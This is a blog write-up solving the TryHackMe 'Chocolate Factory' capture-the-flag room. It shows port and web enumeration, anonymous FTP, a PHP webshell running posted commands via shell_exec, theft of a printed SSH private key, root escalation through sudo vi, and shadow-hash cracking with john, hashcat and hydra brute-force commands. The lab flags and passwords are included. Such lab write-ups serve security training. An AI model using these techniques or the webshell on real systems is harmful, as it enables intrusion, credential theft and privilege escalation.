---
layout: post
title: "Chocolate Factory - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - web
  - thm
  - ftp
  - php
  - eop
date: 2021/01/23 21:36:00
thumbnail: /images/TryHackMe/chocolatefactory.jpeg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Chocolate Factory
- **Profile:** [tryhackme.com](https://tryhackme.com/room/chocolatefactory)
- **Difficulty:** Easy
- **Description**: A Charlie And The Chocolate Factory themed room, revisit Willy Wonka's chocolate factory!

![Chocolate Factory](/images/TryHackMe/chocolatefactory.jpeg)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap perl-image-exiftool ffuf john hashcat hydra
```

## Network enumeration

Service & port discovery scan:

```
# Nmap 7.91 scan initiated Mon Jan 18 19:27:21 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.56.113
Nmap scan report for 10.10.56.113
Host is up (0.080s latency).
Not shown: 65506 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r--    1 1000     1000       208838 Sep 30 14:31 gum_room.jpg
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
|   2048 16:31:bb:b5:1f:cc:cc:12:14:8f:f0:d8:33:b0:08:9b (RSA)
|   256 e7:1f:c9:db:3e:aa:44:b6:72:10:3c:ee:db:1d:33:90 (ECDSA)
|_  256 b4:45:02:b6:24:8e:a9:06:5f:6c:79:44:8a:06:55:5e (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
...
112/tcp open  mcidas?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   GenericLines, NULL:
|     "Welcome to chocolate room!!
|     ___.---------------.
|     .'__'__'__'__'__,` . ____ ___ \r
|     _:\x20 |:. \x20 ___ \r
|     \'__'__'__'__'_`.__| `. \x20 ___ \r
|     \'__'__'__\x20__'_;-----------------`
|     \|______________________;________________|
|     small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_    hope you wont drown Augustus"
113/tcp open  ident?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   GenericLines, Help, NCP, NULL, NotesRPC, SSLSessionReq:
|_    http://localhost/key_rev_key <- You will find the key here!!!
114/tcp open  audionews?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   GenericLines, NULL:
|     "Welcome to chocolate room!!
|     ___.---------------.
|     .'__'__'__'__'__,` . ____ ___ \r
|     _:\x20 |:. \x20 ___ \r
|     \'__'__'__'__'_`.__| `. \x20 ___ \r
|     \'__'__'__\x20__'_;-----------------`
|     \|______________________;________________|
|     small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_    hope you wont drown Augustus"
...
```

There is some useless rabbit hole from port 100 to 125 but look at port 113!

## FTP discovery

```
$ ftp 10.10.56.113
Connected to 10.10.56.113.
220 (vsFTPd 3.0.3)
Name (10.10.56.113:noraj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -A
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       208838 Sep 30 14:31 gum_room.jpg

$ ftp> get gum_room.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes).
226 Transfer complete.
208838 bytes received in 0.136 seconds (1.46 Mbytes/s)
ftp>
221 Goodbye.
```

We have an image that we downloaded.
It seems there is no metadata on it.

```
$ exiftool gum_room.jpg
ExifTool Version Number         : 12.00
File Name                       : gum_room.jpg
Directory                       : .
File Size                       : 204 kB
File Modification Date/Time     : 2021:01:18 19:30:23+01:00
File Access Date/Time           : 2021:01:18 19:30:23+01:00
File Inode Change Date/Time     : 2021:01:18 19:31:54+01:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1
```

This may be a rabbit hole.

## Port 113

There is a hint on port 113.

```
113/tcp open  ident?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   GenericLines, Help, NCP, NULL, NotesRPC, SSLSessionReq:
|_    http://localhost/key_rev_key <- You will find the key here!!!
```

Then we can get the key.

```
$ wget http://10.10.56.113/key_rev_key
```

Let's look, it's not a key but a binary:

```
$ strings key_rev_key
...
Enter your name:
laksdhfas
 congratulations you have found the key:
b'edited'
 Keep its safe
Bad name!
...
```

The key: {% spoiler `-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=` %}

By the way the username was `laksdhfas`.

## Web enumeration

```
$ ffuf -u http://10.10.56.113/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.56.113/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response status: 403
________________________________________________

index.html              [Status: 200, Size: 1466, Words: 87, Lines: 70]
home.php                [Status: 200, Size: 569, Words: 29, Lines: 32]
.                       [Status: 200, Size: 1466, Words: 87, Lines: 70]
validate.php            [Status: 200, Size: 93, Words: 2, Lines: 1]
index.php.bak           [Status: 200, Size: 273, Words: 45, Lines: 13]
```

There is webshell on http://10.10.56.113/home.php.

And `index.php.bak` seems to be a backup of that webshell.

```php
<html>
<body>
<form method="POST">
    <input id="comm" type="text" name="command" placeholder="Command">
    <button>Execute</button>
</form>
<?php
    if(isset($_POST['command']))
    {
        $cmd = $_POST['command'];
        echo shell_exec($cmd);
    }
?>
```

## Web exploitation & EoP from www-data to charlie

So if we run: `ls -lhA /home/charlie` we get:

```
total 32K
-rw-r--r-- 1 charlie charley 3.7K Apr  4  2018 .bashrc
drwx------ 2 charlie charley 4.0K Sep  1 17:17 .cache
drwx------ 3 charlie charley 4.0K Sep  1 17:17 .gnupg
drwxrwxr-x 3 charlie charley 4.0K Sep 29 18:08 .local
-rw-r--r-- 1 charlie charley  807 Apr  4  2018 .profile
-rw-r--r-- 1 charlie charley 1.7K Oct  6 17:13 teleport
-rw-r--r-- 1 charlie charley  407 Oct  6 17:13 teleport.pub
-rw-r----- 1 charlie charley   39 Oct  6 17:11 user.txt
```

We can retrieve a private key: `cat /home/charlie/teleport`

```
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4adrPc3Uh98RYDrZ8CUBDgWLENUybF60lMk9YQOBDR+gpuRW
1AzL12K35/Mi3Vwtp0NSwmlS7ha4y9sv2kPXv8lFOmLi1FV2hqlQPLw/unnEFwUb
L4KBqBemIDefV5pxMmCqqguJXIkzklAIXNYhfxLr8cBS/HJoh/7qmLqrDoXNhwYj
B3zgov7RUtk15Jv11D0Itsyr54pvYhCQgdoorU7l42EZJayIomHKon1jkofd1/oY
fOBwgz6JOlNH1jFJoyIZg2OmEhnSjUltZ9mSzmQyv3M4AORQo3ZeLb+zbnSJycEE
RaObPlb0dRy3KoN79lt+dh+jSg/dM/TYYe5L4wIDAQABAoIBAD2TzjQDYyfgu4Ej
Di32Kx+Ea7qgMy5XebfQYquCpUjLhK+GSBt9knKoQb9OHgmCCgNG3+Klkzfdg3g9
zAUn1kxDxFx2d6ex2rJMqdSpGkrsx5HwlsaUOoWATpkkFJt3TcSNlITquQVDe4tF
w8JxvJpMs445CWxSXCwgaCxdZCiF33C0CtVw6zvOdF6MoOimVZf36UkXI2FmdZFl
kR7MGsagAwRn1moCvQ7lNpYcqDDNf6jKnx5Sk83R5bVAAjV6ktZ9uEN8NItM/ppZ
j4PM6/IIPw2jQ8WzUoi/JG7aXJnBE4bm53qo2B4oVu3PihZ7tKkLZq3Oclrrkbn2
EY0ndcECgYEA/29MMD3FEYcMCy+KQfEU2h9manqQmRMDDaBHkajq20KvGvnT1U/T
RcbPNBaQMoSj6YrVhvgy3xtEdEHHBJO5qnq8TsLaSovQZxDifaGTaLaWgswc0biF
uAKE2uKcpVCTSewbJyNewwTljhV9mMyn/piAtRlGXkzeyZ9/muZdtesCgYEA4idA
KuEj2FE7M+MM/+ZeiZvLjKSNbiYYUPuDcsoWYxQCp0q8HmtjyAQizKo6DlXIPCCQ
RZSvmU1T3nk9MoTgDjkNO1xxbF2N7ihnBkHjOffod+zkNQbvzIDa4Q2owpeHZL19
znQV98mrRaYDb5YsaEj0YoKfb8xhZJPyEb+v6+kCgYAZwE+vAVsvtCyrqARJN5PB
la7Oh0Kym+8P3Zu5fI0Iw8VBc/Q+KgkDnNJgzvGElkisD7oNHFKMmYQiMEtvE7GB
FVSMoCo/n67H5TTgM3zX7qhn0UoKfo7EiUR5iKUAKYpfxnTKUk+IW6ME2vfJgsBg
82DuYPjuItPHAdRselLyNwKBgH77Rv5Ml9HYGoPR0vTEpwRhI/N+WaMlZLXj4zTK
37MWAz9nqSTza31dRSTh1+NAq0OHjTpkeAx97L+YF5KMJToXMqTIDS+pgA3fRamv
ySQ9XJwpuSFFGdQb7co73ywT5QPdmgwYBlWxOKfMxVUcXybW/9FoQpmFipHsuBjb
Jq4xAoGBAIQnMPLpKqBk/ZV+HXmdJYSrf2MACWwL4pQO9bQUeta0rZA6iQwvLrkM
Qxg3lN2/1dnebKK5lEd2qFP1WLQUJqypo5TznXQ7tv0Uuw7o0cy5XNMFVwn/BqQm
G2QwOAGbsQHcI0P19XgHTOB7Dm69rP9j1wIRBOF7iGfwhWdi+vln
-----END RSA PRIVATE KEY-----
```

Let's set the right permissions on it and connect via SSH with it:

```
$ chmod 600 teleport
$ ssh -i teleport charlie@10.10.56.113
charlie@chocolate-factory:/$ pwd
/
charlie@chocolate-factory:/$ cd /home/charlie
charlie@chocolate-factory:/home/charlie$ cat user.txt
flag{edited}
```

User flag: {% spoiler `flag{cd5509042371b34e4826e4838b522d2e}` %}

We can also read the source code of the login page:

```
root@chocolate-factory:/var/www/html# cat validate.php
<?php
        $uname=$_POST['uname'];
        $password=$_POST['password'];
        if($uname=="charlie" && $password=="edited"){
                echo "<script>window.location='home.php'</script>";
        }
        else{
                echo "<script>alert('Incorrect Credentials');</script>";
                echo "<script>window.location='index.html'</script>";
        }
```

Charlie's password: {% spoiler cn7824 %}

## Elevation of Privilege (EoP): from charlie to root

We can launch `vi` as root:

```
$ charlie@chocolate-factory:/home/charlie$ sudo -l
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi
charlie@chocolate-factory:/home/charlie$ sudo vi
```

Then in vi launch a shell: `:!/bin/bash`.

There is no flag but a python script:

```
root@chocolate-factory:/home/charlie# id
uid=0(root) gid=0(root) groups=0(root)
root@chocolate-factory:/home/charlie# cd /root
root@chocolate-factory:/root# cat root.txt
cat: root.txt: No such file or directory
root@chocolate-factory:/root# ls
root.py
```

Let's see the script:

```python
from cryptography.fernet import Fernet
import pyfiglet
key=input("Enter the key:  ")
f=Fernet(key)
encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'
dcrypt_mess=f.decrypt(encrypted_mess)
mess=dcrypt_mess.decode()
display1=pyfiglet.figlet_format("You Are Now The Owner Of ")
display2=pyfiglet.figlet_format("Chocolate Factory ")
print(display1)
print(display2)
```

The script is asking for the key to decrypt the flag:

```
root@chocolate-factory:/root# python root.py
Enter the key:  "-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY="
__   __               _               _   _                 _____ _
\ \ / /__  _   _     / \   _ __ ___  | \ | | _____      __ |_   _| |__   ___
 \ V / _ \| | | |   / _ \ | '__/ _ \ |  \| |/ _ \ \ /\ / /   | | | '_ \ / _ \
  | | (_) | |_| |  / ___ \| | |  __/ | |\  | (_) \ V  V /    | | | | | |  __/
  |_|\___/ \__,_| /_/   \_\_|  \___| |_| \_|\___/ \_/\_/     |_| |_| |_|\___|

  ___                              ___   __
 / _ \__      ___ __   ___ _ __   / _ \ / _|
| | | \ \ /\ / / '_ \ / _ \ '__| | | | | |_
| |_| |\ V  V /| | | |  __/ |    | |_| |  _|
 \___/  \_/\_/ |_| |_|\___|_|     \___/|_|


  ____ _                     _       _
 / ___| |__   ___   ___ ___ | | __ _| |_ ___
| |   | '_ \ / _ \ / __/ _ \| |/ _` | __/ _ \
| |___| | | | (_) | (_| (_) | | (_| | ||  __/
 \____|_| |_|\___/ \___\___/|_|\__,_|\__\___|

 _____          _
|  ___|_ _  ___| |_ ___  _ __ _   _
| |_ / _` |/ __| __/ _ \| '__| | | |
|  _| (_| | (__| || (_) | |  | |_| |
|_|  \__,_|\___|\__\___/|_|   \__, |
                              |___/

flag{edited}
```

Root flag: {% spoiler `flag{cec59161d338fef787fcb4e296b42124}` %}

## Bonus: hash cracking

We may have missed charlie's password so now that we are root let's grep
the hash and crack it.

```
root@chocolate-factory:/root# cat /etc/shadow
root:$6$.hWj2crD$ch//0HP/gRcEpyW10XktEpu0bDYU51MZaUuzHpb..Han2SFSiNEZgc1/utcnlKbyyhUKb768ouSAd8ITNlWlb/:18534:0:99999:7:::
...
charlie:$6$J1Cmev6V$ifUMOM0VViXR0/8BKz7FLIG8mkT5i1QHdzAXV6A.9l8g51baubW6QK4CHKuKzRGL75cmc/W6hv3VNUSOukcmM1:18534:0:99999:7:::
```

Crack the hash with john:

```
$ john --format=sha512crypt hashes.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
2232             (root)
2232             (charlie)
2g 0:00:05:10 DONE (2021-01-18 20:37) 0.006434g/s 1433p/s 2867c/s 2867C/s 231116..2221985
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

Crack the hash with hashcat:

```
$ hashcat -m 1800 hashes.txt /usr/share/wordlists/passwords/rockyou.txt -O
```

Both the web and system passwords are included in rockyou so we could just have
used hydra to brute-force them (but it would have required a ridiculous amount
of time because the BF over SSH is only about 30 tries/min and about 2800 tries/min
over HTTP).

```
$ hydra -l root -P /usr/share/wordlists/passwords/rockyou.txt 10.10.56.113 -t 4 ssh
$ hydra -l charlie -P /usr/share/wordlists/passwords/rockyou.txt 10.10.56.113 http-post-form '/validate.php:uname=^USER^&password=^PASS^:F=Incorrect'
```
